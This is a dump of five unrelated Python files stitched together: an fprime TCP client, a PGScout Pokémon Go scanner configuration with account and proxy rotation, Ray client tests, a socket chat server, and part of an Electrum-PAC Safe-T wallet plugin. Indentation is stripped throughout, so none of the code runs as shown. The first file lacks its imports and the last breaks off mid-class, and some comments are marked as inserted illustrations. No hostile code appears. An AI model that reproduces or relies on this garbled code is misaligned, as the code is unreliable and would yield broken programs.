FSW_TAG = "FSW"
class ThreadedTCPSocketClient(DataHandler):
"""
Threaded TCP client that connects to the socket server that serves packets from the flight
software
"""
def __init__(self, sock=None, dest=FSW_TAG):
"""
Threaded client socket constructor
Keyword Arguments:
sock {Socket} -- A socket for the client to use. Creates its own if
None (default: {None})
dest {String} -- Default destination tag used by data_callback, either FSW_TAG or GUI_TAG (default: {FSW_TAG})
"""
if sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
self.sock = sock
# NOTE can't do this b/c EINPROGRESS: self.sock.setblocking(0)
self.dest = dest
self.__distributors = []
self.__select_timeout = 1
self.__data_recv_thread = threading.Thread(target=self.recv)
self.stop_event = threading.Event()
def get_data_bytes(self, string_data):
"""
Convert data from a string into bytes using DATA_ENCODING
:param string_data: data in string format
:return: data in bytes format
"""
if sys.version_info >= (3, 0):
return string_data.encode(DATA_ENCODING)
return string_data
def get_data_string(self, bytes_data):
"""
Convert data from bytes into a string using DATA_ENCODING
:param bytes_data: data in bytes format
:return: data in string format
"""
if sys.version_info >= (3, 0):
return bytes_data.decode(DATA_ENCODING)
return bytes_data
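# Illustrative round trip (not part of the original file; assumes DATA_ENCODING is a
# text codec such as 'utf-8'):
#   client.get_data_bytes("Register GUI\n")   -> b"Register GUI\n"   (on Python 3)
#   client.get_data_string(b"Register GUI\n") -> "Register GUI\n"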
def register_distributor(self, distributor):
"""Registers a fprime.gds.distributor object with this socket
Arguments:
fprime.gds.distributor {Distributor} -- Distributor must implement data_callback
"""
self.__distributors.append(distributor)
def register_to_server(self, register_as):
"""
Registers the caller to the server as type register_as
This function assumes the socket connects to an fprime TCP server
Args:
register_as (string): How to identify this process to the TCP server
Can be either "FSW" or "GUI"
"""
data = "Register %s\n" % register_as
self.sock.send(self.get_data_bytes(data))
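# Illustrative usage (hypothetical host/port; assumes an fprime TCP server is listening):
#   client = ThreadedTCPSocketClient()
#   client.connect("127.0.0.1", 50050)
#   client.register_to_server(GUI_TAG)   # sends b"Register GUI\n" to the server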
def connect(self, host, port):
"""Connect to host at given port and start the threaded recv method.
Arguments:
host {string} -- IP of the host server
port {int} -- Port of the host server
"""
try:
self.sock.connect((host, port))
self.__data_recv_thread.start()
except OSError:
print("There was a problem connecting to the TCP Server")
sys.exit(-1)
def disconnect(self):
"""Disconnect the socket client from the server and stop the internal thread.
"""
self.stop_event.set()
self.__data_recv_thread.join()
self.sock.close()
def data_callback(self, data, sender=None):
"""
Handles incoming data by sending it to a socket.
:param data: data to send to the client socket
:param sender: sender source of the data
"""
self.send(data, self.dest)
def send(self, data, dest):
"""
Send data to the server
All necessary headers are added in this function.
Arguments:
data {binary} -- The data to send (What you want the destination
to receive)
dest {String} -- Where to send the data to. Either "FSW" or "GUI"
"""
self.sock.send(b"A5A5 %s %s" % (self.get_data_bytes(dest), data))
def recv(self):
"""
Method run constantly by the enclosing thread. Looks for data from the server.
"""
while not self.stop_event.is_set():
ready = select.select([self.sock], [], [], self.__select_timeout)
if ready[0]:
chunk = self.sock.recv(1024)
for d in self.__distributors:
d.on_recv(chunk)
|
config.py
|
# Configuration with default values
import json
import logging
import os
import sys
from threading import Thread
import configargparse
import time
from mrmime import init_mr_mime
from mrmime.cyclicresourceprovider import CyclicResourceProvider
from pgscout.proxy import check_proxies
log = logging.getLogger(__name__)
args = None
def cfg_get(key, default=None):
global args
return getattr(args, key, default)
def cfg_set(key, value):
global args
setattr(args, key, value)
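# Illustrative usage (after parse_args() has populated `args`):
#   cfg_get('port')            -> 4242 by default
#   cfg_set('port', 8080)
#   cfg_get('port')            -> 8080
#   cfg_get('no_such_key', 3)  -> 3 (falls back to the provided default)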
def parse_args():
global args
defaultconfigfiles = []
if '-c' not in sys.argv and '--config' not in sys.argv:
defaultconfigfiles = ['config.ini']
parser = configargparse.ArgParser(
default_config_files=defaultconfigfiles)
parser.add_argument('-c', '--config',
is_config_file=True, help='Specify configuration file.')
parser.add_argument('-hs', '--host', default='127.0.0.1',
help='Host or IP to bind to.')
parser.add_argument('-p', '--port', type=int, default=4242,
help='Port to bind to.')
parser.add_argument('-hk', '--hash-key', required=True, action='append',
help='Hash key(s) to use.')
parser.add_argument('-pf', '--proxies-file',
help='Load proxy list from text file (one proxy per line).')
parser.add_argument('-l', '--level', type=int, default=30,
help='Minimum trainer level required. Lower levels will yield an error.')
parser.add_argument('-pgpmult', '--pgpool-acct-multiplier', type=int, default=1,
help='Use each account fetched from PGPOOL this number of times')
parser.add_argument('-mqj', '--max-queued-jobs', type=int, default=0,
help='Maximum number of queued scout jobs before rejecting new jobs. 0 (default) means no restriction.')
parser.add_argument('-mjttl', '--max-job-ttl', type=int, default=0,
help='Maximum number of minutes a job is allowed to be queued before it expires (Time-To-Live). '
"Expired jobs will be rejected when it's their turn. 0 (default) means no restriction.")
parser.add_argument('-sb', '--shadowban-threshold', type=int, default=5,
help='Mark an account as shadowbanned after this many errors. ' +
'If --pgpool_url is specified the account gets swapped out.')
parser.add_argument('-iv', '--initial-view', default="logs",
help=('Initial view. Can be one of "logs", "scouts" or "pokemon". Default is "logs".'))
parser.add_argument('-pgpu', '--pgpool-url',
help='Address of PGPool to load accounts from and/or update their details.')
parser.add_argument('-pgpsid', '--pgpool-system-id',
help='System ID for PGPool. Required if --pgpool-url given.')
parser.add_argument('-lpf', '--low-prio-file',
help='File with Pokemon names or IDs that will be treated with low priority or even dropped.')
parser.add_argument('-ct', '--cache-timer', type=int, default=60,
help='Minutes of caching to perform (default 60)')
accs = parser.add_mutually_exclusive_group(required=True)
accs.add_argument('-pgpn', '--pgpool-num-accounts', type=int, default=0,
help='Use this many accounts from PGPool. --pgpool-url required.')
accs.add_argument('-a', '--accounts-file',
help='Load accounts from CSV file containing "auth_service,username,passwd" lines.')
args = parser.parse_args()
def init_resoures_from_file(resource_file):
resources = []
if resource_file:
try:
with open(resource_file) as f:
for line in f:
# Ignore blank lines and comment lines.
if len(line.strip()) == 0 or line.startswith('#'):
continue
resources.append(line.strip())
except IOError:
log.exception('Could not load resources from {}.'.format(resource_file))
exit(1)
return resources
def get_pokemon_name(pokemon_id):
if not hasattr(get_pokemon_name, 'pokemon'):
file_path = os.path.join('pokemon.json')
with open(file_path, 'r') as f:
get_pokemon_name.pokemon = json.loads(f.read())
return get_pokemon_name.pokemon[str(pokemon_id)]
def get_pokemon_id(pokemon_name):
if not hasattr(get_pokemon_id, 'ids'):
if not hasattr(get_pokemon_name, 'pokemon'):
# initialize from file
get_pokemon_name(1)
get_pokemon_id.ids = {}
for pokemon_id, name in get_pokemon_name.pokemon.iteritems():
get_pokemon_id.ids[name] = int(pokemon_id)
return get_pokemon_id.ids.get(pokemon_name, -1)
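# Illustrative lookups (assume pokemon.json maps Pokedex IDs to English names):
#   get_pokemon_name(25)          -> 'Pikachu'
#   get_pokemon_id('Pikachu')     -> 25
#   get_pokemon_id('NotAPokemon') -> -1   (unknown names map to -1)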
def read_pokemon_ids_from_file(f):
pokemon_ids = set()
for name in f:
name = name.strip()
# Skip blank lines and lines starting with '#'
if not name or name.startswith('#'):
continue
try:
# Pokemon can be given as Pokedex ID
pid = int(name)
except ValueError:
# Perform the usual name -> ID lookup
pid = get_pokemon_id(unicode(name, 'utf-8'))
if pid and not pid == -1:
pokemon_ids.add(pid)
return sorted(pokemon_ids)
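# Example low-priority file (Pokemon names or Pokedex IDs, one per line; '#' lines are skipped):
#   # common spawns
#   Pidgey
#   19
#   Zubat
# read_pokemon_ids_from_file(open('low_prio.txt')) would then return [16, 19, 41],
# assuming the standard Pokedex numbering in pokemon.json.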
def cfg_init():
log.info("Loading PGScout configuration...")
parse_args()
# MrMime config
mrmime_cfg = {
'pgpool_system_id': args.pgpool_system_id,
'exception_on_captcha': True
}
if args.pgpool_acct_multiplier > 1:
mrmime_cfg.update({
'request_retry_delay': 1,
'full_login_flow': False,
'scan_delay': 5
})
if args.pgpool_url:
mrmime_cfg['pgpool_url'] = args.pgpool_url
log.info("Attaching to PGPool at {}".format(args.pgpool_url))
init_mr_mime(mrmime_cfg)
# Collect hash keys
args.hash_key_provider = CyclicResourceProvider()
for hk in args.hash_key:
args.hash_key_provider.add_resource(hk)
# Collect proxies
args.proxies = check_proxies(cfg_get('proxies_file'))
args.proxy_provider = CyclicResourceProvider()
for proxy in args.proxies:
args.proxy_provider.add_resource(proxy)
args.low_prio_pokemon = []
if args.low_prio_file:
with open(args.low_prio_file) as f:
args.low_prio_pokemon = read_pokemon_ids_from_file(f)
if args.low_prio_pokemon:
log.info("{} low priority Pokemon loaded from {}".format(len(args.low_prio_pokemon), args.low_prio_file))
t = Thread(target=watch_low_prio_file, args=(args.low_prio_file,))
t.daemon = True
t.start()
def watch_low_prio_file(filename):
statbuf = os.stat(filename)
watch_low_prio_file.tstamp = statbuf.st_mtime
while True:
statbuf = os.stat(filename)
current_mtime = statbuf.st_mtime
if current_mtime != watch_low_prio_file.tstamp:
with open(filename) as f:
cfg_set('low_prio_pokemon', read_pokemon_ids_from_file(f))
log.info("File {} changed on disk. Re-read.".format(filename))
watch_low_prio_file.tstamp = current_mtime
time.sleep(5)
def use_pgpool():
return bool(args.pgpool_url and args.pgpool_system_id and args.pgpool_num_accounts > 0)
|
test_client.py
|
import pytest
import time
import sys
import logging
import threading
import _thread
import ray.util.client.server.server as ray_client_server
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import ray_start_client_server
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_interrupt_ray_get(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
time.sleep(1)
return "ok"
class Interrupt(threading.Thread):
def run(self):
time.sleep(2)
_thread.interrupt_main()
it = Interrupt()
it.start()
with pytest.raises(KeyboardInterrupt):
ray.get(block.remote())
# Assert we can still get new items after the interrupt.
assert ray.get(fast.remote()) == "ok"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or \
(ready, remaining) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) \
or (ready_retval, remaining_retval) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef(b"blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return ("Hello " + whom, self.count)
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
s, count = ray.get(actor.say_hello.remote("world"))
assert s == "Hello world"
assert count == 2
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact,
10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(actor_handle.exec_exec.remote(second_actor, fact,
9)) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj,
4)) == local_fact(4)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
        # Allow some time to propagate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2
assert any((msg.find("get") >= 0 for msg in logs_with_id))
assert any((msg.find("put") >= 0 for msg in logs_with_id))
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
assert len(log_msgs) == 2
        assert all(msg.find("Hello world") >= 0 for msg in log_msgs)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_serializing_exceptions(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(ValueError):
ray.get_actor("abc")
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor.
"""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(
name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
        detached_actor = ray.get_actor("test_acc2")
        for i in range(5):
            detached_actor.inc.remote()
        assert ray.get(detached_actor.get.remote()) == 6
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") == b""
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server, ))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
server_gui.py
|
import socket
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the cave! Now type your name and press enter!", "utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client): # Takes client socket as argument.
"""Handles a single client connection."""
name = client.recv(BUFSIZ).decode("utf8")
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
clients[client] = name
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
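# --- Hedged example (not part of the original file) --------------------------
# A minimal sketch of a client for the protocol implemented above: connect,
# read the greeting, send a name, exchange UTF-8 messages, and send "{quit}"
# to leave. The function name `example_client` and its default arguments are
# illustrative assumptions only; nothing in this module calls it.
def example_client(host="127.0.0.1", port=33000, name="guest"):
    """Connect to the chat server above, say hello, then quit."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    print(sock.recv(1024).decode("utf8"))  # greeting sent right after accept()
    sock.send(bytes(name, "utf8"))         # registers the chosen name
    print(sock.recv(1024).decode("utf8"))  # personalised welcome message
    sock.send(bytes("hello everyone", "utf8"))
    sock.send(bytes("{quit}", "utf8"))     # asks the server to disconnect us
    sock.close()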
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket.socket()  # explicit (AF_INET, SOCK_STREAM) arguments broke on macOS, so rely on the defaults
SERVER.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
SERVER.bind(ADDR)
if __name__ == "__main__":
# setting up the connection
SERVER.listen(5)
print("Hostname", socket.gethostname())
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
# closing out server
SERVER.close()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_pac.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_pac.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_pac import constants
from electrum_pac.i18n import _
from electrum_pac.plugin import BasePlugin, Device
from electrum_pac.transaction import deserialize, Transaction
from electrum_pac.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_pac.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'Safe-T mini', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "PacTestnet" if constants.net.TESTNET else "Pac"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
